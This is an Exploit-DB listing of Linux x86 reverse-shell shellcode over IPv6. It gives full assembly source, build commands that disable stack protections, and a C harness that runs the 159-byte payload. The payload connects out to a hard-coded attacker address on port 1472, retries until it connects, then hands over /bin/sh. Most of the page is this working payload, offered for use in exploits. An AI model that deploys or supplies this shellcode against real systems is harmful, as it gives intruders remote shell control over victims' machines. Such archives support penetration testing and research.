Linux/x86 - Reverse (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)

EDB-ID:

39722

CVE:

N/A

EDB Verified:

Author:

Roziul Hasan Khan Shifat

Type:

shellcode

Exploit:   /  

Platform:

Linux_x86

Date:

2016-04-25

Vulnerable App: 
/*

# Title: linux x86 reverse tcp (ipv6)
# Date: 22-04-2016
# Exploit Author: Roziul Hasan Khan Shifat
# Tested on: kali 2.0 and Ubuntu 14.04 LTS
# Contact: shifath12@gmail.com

*/

/*
section .text
	global _start
_start:

;;socket()
xor ebx,ebx
mul ebx ;null out eax

push byte 6
push byte 0x1
push byte 10

mov ecx,esp

mov al,102 ;socketcall()
mov bl,1 ;socket()
int 0x80

mov esi,eax ;storing socket descriptor (we know return value of any syscall stores in eax)

xor eax,eax

mov al,2
xor ebx,ebx
int 80h


cmp eax,ebx
je connect
ja exit

;------------------

;------------------------

connect:

xor ecx,ecx
;-------------------------------------------------------
;struct sockaddr_in6
xor ebx,ebx

push dword ebx ;sin6_scope_id 4 byte

push dword 0x8140a8c0 ; only change it to Your ipv4 address (current ipv4 192.168.64.129)

push word 0xffff
push dword ebx
push dword ebx
push word bx ;sin6_addr 16 byte (ipv6 address ::ffff:192.168.64.129)

push dword ebx ;sin6_flowinfo=4 byte

push word 0xc005 ;sin6_port 2 byte (port 1472)

push word 10 ;sa_family_t=2 byte 

;end of struct sockaddr_in6

mov ecx,esp

;--------------------------------------------

;;connect()

push byte 28 ;sizeof ;struct sockaddr_in6

push ecx

push esi

xor ebx,ebx
xor eax,eax
mov al,102
mov bl,3 ;connect()
mov ecx,esp
int 0x80

xor ebx,ebx

cmp eax,ebx
jne retry ;if it fails to connect ,it will  retry to connect to attacker after 10 seconds

;dup2(sd,0)

xor ecx,ecx
mul ecx

mov ebx,esi
mov al,63
int 80h

;dup2(sd,1)

xor eax,eax
inc ecx

mov ebx,esi
mov al,63
int 80h

;;dup2(sd,2)

xor eax,eax
inc ecx

mov ebx,esi
mov al,63
int 80h

;;execve(/bin//sh)

xor edx,edx
mul edx

push edx ;null terminated /bin//sh
push 0x68732f2f
push 0x6e69622f

mov ebx,esp

push edx
push ebx

mov ecx,esp

mov al,11 ;execve()
int 0x80

ret

;------------------------------------------------------

retry:

xor ebx,ebx

push ebx
push byte 10

mul ebx
mov ebx,esp

mov al,0xa2 ;nanosleep()

int 80h

jmp connect

ret

;----------------------------
exit:
xor eax,eax
mov al,1
int 80h

*/


/* 
to compile:

$nasm -f elf filename.s
$ld filename.o
$./a.out

to compile shellcode

$gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
$./shellcode

*/


#include<string.h>
#include<stdio.h>
char shellcode[]="\x31\xdb\xf7\xe3\x6a\x06\x6a\x01\x6a\x0a\x89\xe1\xb0\x66\xb3\x01\xcd\x80\x89\xc6\x31\xc0\xb0\x02\x31\xdb\xcd\x80\x39\xd8\x74\x02\x77\x77\x31\xc9\x31\xdb\x53\x68\xc0\xa8\x40\x81\x66\x6a\xff\x53\x53\x66\x53\x53\x66\x68\x05\xc0\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x31\xdb\x31\xc0\xb0\x66\xb3\x03\x89\xe1\xcd\x80\x31\xdb\x39\xd8\x75\x36\x31\xc9\xf7\xe1\x89\xf3\xb0\x3f\xcd\x80\x31\xc0\x41\x89\xf3\xb0\x3f\xcd\x80\x31\xc0\x41\x89\xf3\xb0\x3f\xcd\x80\x31\xd2\xf7\xe2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\xc3\x31\xdb\x53\x6a\x0a\xf7\xe3\x89\xe3\xb0\xa2\xcd\x80\xeb\x8a\xc3\x31\xc0\xb0\x01\xcd\x80";


int (*exec_shellcode)();
main()
{
printf("Shellcode length: %ld\n",(long)strlen(shellcode));
exec_shellcode=(int(*)())shellcode;
(*exec_shellcode)();

}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services